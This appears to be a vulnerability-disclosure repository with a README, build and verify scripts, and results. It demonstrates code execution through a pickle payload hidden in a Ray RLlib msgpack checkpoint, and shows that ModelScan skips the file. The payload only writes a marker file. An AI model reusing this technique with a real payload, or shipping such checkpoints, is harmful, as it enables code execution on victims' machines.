Upload folder using huggingface_hub

README.md

@@ -0,0 +1,107 @@
+# Benign MessagePack / RLlib Checkpoint Security PoC
+
+This repository stages a safe proof-of-concept for a MessagePack-based ML checkpoint loading issue. The artifact is a tiny `state.msgpack` file that follows the Ray RLlib checkpoint state-file shape and carries a NumPy object-dtype array encoded through `msgpack-numpy`.
+
+When decoded through Ray RLlib's `restore_from_path()` MessagePack path, the current `msgpack-numpy` decoder reaches `pickle.loads()` for object-dtype array data. The embedded payload only writes a local marker file named `MSG_PACK_NUMPY_MARKER.txt`.
+
+## Files
+
+- `state.msgpack` - benign PoC checkpoint state file.
+- `verify_poc.py` - verifies plain MessagePack parsing, direct `msgpack-numpy` parsing, and Ray RLlib restore behavior.
+- `build_poc.py` - reproduces the artifact generation.
+- `artifact_manifest.json` - SHA256, size, and marker details.
+- `results.json` - local verification output.
+- `scanner_output_file.json` - ModelScan 0.8.8 output for `state.msgpack`.
+- `scanner_output_dir.json` - ModelScan 0.8.8 output for this staged folder.
+- `requirements.txt` - pinned reproduction dependencies used for this validation.
+
+## Tested Versions
+
+- Python 3.12.12
+- Ray 2.55.1
+- msgpack 1.1.2
+- msgpack-numpy 0.4.8
+- NumPy 2.4.4
+- ModelScan 0.8.8
+
+## Reproduction
+
+```bash
+python -m venv .venv
+.venv/Scripts/python -m pip install -r requirements.txt
+.venv/Scripts/python build_poc.py
+.venv/Scripts/python verify_poc.py
+.venv/Scripts/modelscan -p state.msgpack -r json -o scanner_output_file.json --show-skipped
+```
+
+On Linux/macOS, replace `.venv/Scripts/python` with `.venv/bin/python`.
+
+Expected behavior:
+
+- Plain `msgpack.load()` parses the file as data and does not create the marker.
+- `msgpack_numpy.load()` creates `MSG_PACK_NUMPY_MARKER.txt`.
+- Ray RLlib `Checkpointable.restore_from_path()` creates `MSG_PACK_NUMPY_MARKER.txt`.
+- ModelScan 0.8.8 reports `total_scanned: 0` and skips `state.msgpack` as `SCAN_NOT_SUPPORTED`.
+
+## Evidence Summary
+
+Artifact:
+
+```text
+SHA256: 3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
+Size: 506 bytes
+```
+
+Runtime:
+
+```json
+"ray_rllib_restore_check": {
+  "restored_keys": ["format", "object_array", "safe_weights"],
+  "object_array_type": "ndarray",
+  "object_array_repr": "array([34], dtype=object)",
+  "marker_created": true,
+  "marker_text": "msgpack_numpy_object_array_marker\n"
+}
+```
+
+Scanner:
+
+```json
+"scanned": {"total_scanned": 0},
+"skipped": {
+  "total_skipped": 1,
+  "skipped_files": [{
+    "category": "SCAN_NOT_SUPPORTED",
+    "description": "Model Scan did not scan file",
+    "source": "state.msgpack"
+  }]
+}
+```
+
+## Why This Is ML-Format Relevant
+
+Ray RLlib documents checkpoints as model/training artifacts that can be saved to local disk or cloud storage and restored through `restore_from_path()` / `from_checkpoint()`. The docs state that checkpoint directories contain a `pickle` or `msgpack` state file, and current RLlib source loads `state.msgpack` with a `msgpack` module patched by `msgpack-numpy`.
+
+Primary references:
+
+- Ray RLlib checkpoint docs: https://docs.ray.io/en/latest/rllib/checkpoints.html
+- Ray RLlib source for `state.msgpack` restore and `try_import_msgpack`: https://docs.ray.io/en/latest/_modules/ray/rllib/utils/checkpoints.html
+- msgpack-numpy 0.4.8 decoder source: https://github.com/lebedov/msgpack-numpy/blob/0.4.8/msgpack_numpy.py
+- ModelScan 0.8.8 supported scanner extensions: https://github.com/protectai/modelscan/blob/v0.8.8/modelscan/settings.py
+
+## Security Impact
+
+An attacker-controlled RLlib `.msgpack` checkpoint state file can trigger arbitrary Python execution when a victim restores the checkpoint through RLlib's MessagePack path. This PoC uses a harmless local marker write, but the primitive is Python pickle execution hidden inside a MessagePack/NumPy serialization layer.
+
+Limitations:
+
+- This is not a native parser memory-corruption issue.
+- It requires a victim workflow that restores an untrusted Ray RLlib MessagePack checkpoint or otherwise decodes the artifact through `msgpack-numpy`.
+- The scanner evidence is a ModelScan unsupported-format gap for a dangerous `.msgpack` artifact, not a claim that every Hugging Face scanner accepts the file as clean.
+
+## Mitigations
+
+- Do not restore untrusted RLlib MessagePack checkpoints.
+- Reject or sanitize object-dtype arrays during MessagePack checkpoint restore.
+- Avoid `msgpack_numpy.patch()` for untrusted checkpoint data, or make the object-dtype pickle path opt-in only.
+- Add scanner support for `.msgpack` model artifacts that recursively detects nested pickle payloads in `msgpack-numpy` object-array records.

artifact_manifest.json

@@ -0,0 +1,8 @@
+{
+  "artifact": "state.msgpack",
+  "sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
+  "size_bytes": 506,
+  "marker_file": "MSG_PACK_NUMPY_MARKER.txt",
+  "marker_text": "msgpack_numpy_object_array_marker",
+  "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy."
+}

build_poc.py

@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+"""Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""
+
+from __future__ import annotations
+
+import hashlib
+import json
+from pathlib import Path
+
+import msgpack_numpy
+import numpy as np
+
+
+ARTIFACT_NAME = "state.msgpack"
+MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
+MARKER_TEXT = "msgpack_numpy_object_array_marker\n"
+
+
+class Marker:
+    def __reduce__(self):
+        # Benign local marker-file proof. No network, persistence, or destructive action.
+        code = (
+            "__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
+            % (MARKER_NAME, MARKER_TEXT)
+        )
+        return (eval, (code,))
+
+
+def sha256(path: Path) -> str:
+    digest = hashlib.sha256()
+    with path.open("rb") as handle:
+        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
+            digest.update(chunk)
+    return digest.hexdigest()
+
+
+def main() -> None:
+    out_dir = Path(__file__).resolve().parent
+    artifact = out_dir / ARTIFACT_NAME
+
+    state = {
+        "format": "ray_rllib_state_msgpack",
+        "safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
+        "object_array": np.array([Marker()], dtype=object),
+    }
+    artifact.write_bytes(msgpack_numpy.packb(state, use_bin_type=True))
+
+    manifest = {
+        "artifact": ARTIFACT_NAME,
+        "sha256": sha256(artifact),
+        "size_bytes": artifact.stat().st_size,
+        "marker_file": MARKER_NAME,
+        "marker_text": MARKER_TEXT.strip(),
+        "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
+    }
+    (out_dir / "artifact_manifest.json").write_text(
+        json.dumps(manifest, indent=2) + "\n",
+        encoding="utf-8",
+    )
+    print(json.dumps(manifest, indent=2))
+
+
+if __name__ == "__main__":
+    main()

requirements.txt

@@ -0,0 +1,5 @@
+ray[rllib]==2.55.1
+msgpack==1.1.2
+msgpack-numpy==0.4.8
+numpy==2.4.4
+modelscan==0.8.8

results.json

@@ -0,0 +1,44 @@
+{
+  "artifact": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc\\state.msgpack",
+  "artifact_sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
+  "artifact_size_bytes": 506,
+  "versions": {
+    "python": "3.12.12 (main, Oct 28 2025, 14:15:42) [MSC v.1944 64 bit (AMD64)]",
+    "ray": "2.55.1",
+    "msgpack": "1.1.2",
+    "msgpack-numpy": "0.4.8",
+    "numpy": "2.4.4",
+    "modelscan": "0.8.8"
+  },
+  "plain_msgpack_check": {
+    "plain_msgpack_type": "dict",
+    "plain_msgpack_keys": [
+      "format",
+      "object_array",
+      "safe_weights"
+    ],
+    "marker_created": false
+  },
+  "direct_msgpack_numpy_check": {
+    "msgpack_numpy_type": "dict",
+    "msgpack_numpy_keys": [
+      "format",
+      "object_array",
+      "safe_weights"
+    ],
+    "marker_created": true,
+    "marker_text": "msgpack_numpy_object_array_marker\n"
+  },
+  "ray_rllib_restore_check": {
+    "restored_keys": [
+      "format",
+      "object_array",
+      "safe_weights"
+    ],
+    "object_array_type": "ndarray",
+    "object_array_repr": "array([34], dtype=object)",
+    "marker_created": true,
+    "marker_text": "msgpack_numpy_object_array_marker\n"
+  },
+  "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue."
+}

scanner_output_dir.json

@@ -0,0 +1 @@
+{"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": ".", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.546341", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 7, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "artifact_manifest.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "build_poc.py"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "results.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_dir.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_file.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "verify_poc.py"}]}}, "issues": [], "errors": []}

scanner_output_file.json

@@ -0,0 +1 @@
+{"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": "state.msgpack", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.524512", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 1, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}]}}, "issues": [], "errors": []}

state.msgpack

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
+size 506

verify_poc.py

@@ -0,0 +1,141 @@
+#!/usr/bin/env python
+"""Verify the benign MessagePack/model checkpoint deserialization PoC."""
+
+from __future__ import annotations
+
+import argparse
+import hashlib
+import importlib.metadata as metadata
+import json
+import sys
+from pathlib import Path
+from typing import Any, Dict, Optional, Tuple
+
+import msgpack
+import msgpack_numpy
+import numpy as np
+import ray
+from ray.rllib.utils.checkpoints import Checkpointable
+
+
+ARTIFACT_NAME = "state.msgpack"
+MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
+
+
+class DemoCheckpointable(Checkpointable):
+    def __init__(self) -> None:
+        self.restored_state: Optional[Dict[str, Any]] = None
+
+    def get_state(self, components=None, *, not_components=None, **kwargs):
+        return {}
+
+    def set_state(self, state):
+        self.restored_state = state
+
+    def get_ctor_args_and_kwargs(self) -> Tuple[Tuple, Dict[str, Any]]:
+        return (), {}
+
+
+def sha256(path: Path) -> str:
+    digest = hashlib.sha256()
+    with path.open("rb") as handle:
+        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
+            digest.update(chunk)
+    return digest.hexdigest()
+
+
+def package_version(name: str) -> str:
+    try:
+        return metadata.version(name)
+    except metadata.PackageNotFoundError:
+        return "not installed"
+
+
+def plain_msgpack_check(artifact: Path, marker: Path) -> Dict[str, Any]:
+    marker.unlink(missing_ok=True)
+    with artifact.open("rb") as handle:
+        data = msgpack.load(handle, raw=False, strict_map_key=False)
+    return {
+        "plain_msgpack_type": type(data).__name__,
+        "plain_msgpack_keys": sorted(str(k) for k in data.keys()),
+        "marker_created": marker.exists(),
+    }
+
+
+def rllib_restore_check(checkpoint_dir: Path, marker: Path) -> Dict[str, Any]:
+    marker.unlink(missing_ok=True)
+    demo = DemoCheckpointable()
+    demo.restore_from_path(checkpoint_dir)
+    restored = demo.restored_state or {}
+    marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
+    object_value = restored.get("object_array")
+    return {
+        "restored_keys": sorted(restored.keys()),
+        "object_array_type": type(object_value).__name__,
+        "object_array_repr": repr(object_value),
+        "marker_created": marker.exists(),
+        "marker_text": marker_text,
+    }
+
+
+def direct_msgpack_numpy_check(artifact: Path, marker: Path) -> Dict[str, Any]:
+    marker.unlink(missing_ok=True)
+    with artifact.open("rb") as handle:
+        data = msgpack_numpy.load(handle, raw=False, strict_map_key=False)
+    marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
+    return {
+        "msgpack_numpy_type": type(data).__name__,
+        "msgpack_numpy_keys": sorted(data.keys()),
+        "marker_created": marker.exists(),
+        "marker_text": marker_text,
+    }
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument(
+        "--artifact",
+        type=Path,
+        default=Path(__file__).resolve().parent / ARTIFACT_NAME,
+    )
+    parser.add_argument(
+        "--results",
+        type=Path,
+        default=Path(__file__).resolve().parent / "results.json",
+    )
+    args = parser.parse_args()
+
+    artifact = args.artifact.resolve()
+    checkpoint_dir = artifact.parent
+    marker = Path.cwd() / MARKER_NAME
+
+    if not artifact.exists():
+        raise FileNotFoundError(artifact)
+
+    results = {
+        "artifact": str(artifact),
+        "artifact_sha256": sha256(artifact),
+        "artifact_size_bytes": artifact.stat().st_size,
+        "versions": {
+            "python": sys.version,
+            "ray": ray.__version__,
+            "msgpack": package_version("msgpack"),
+            "msgpack-numpy": package_version("msgpack-numpy"),
+            "numpy": np.__version__,
+            "modelscan": package_version("modelscan"),
+        },
+        "plain_msgpack_check": plain_msgpack_check(artifact, marker),
+        "direct_msgpack_numpy_check": direct_msgpack_numpy_check(artifact, marker),
+        "ray_rllib_restore_check": rllib_restore_check(checkpoint_dir, marker),
+        "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue.",
+    }
+
+    args.results.write_text(json.dumps(results, indent=2, default=str) + "\n", encoding="utf-8")
+    print(json.dumps(results, indent=2, default=str))
+
+    if not results["ray_rllib_restore_check"]["marker_created"]:
+        raise SystemExit("marker was not created through Ray RLlib restore path")
+
+
+if __name__ == "__main__":
+    main()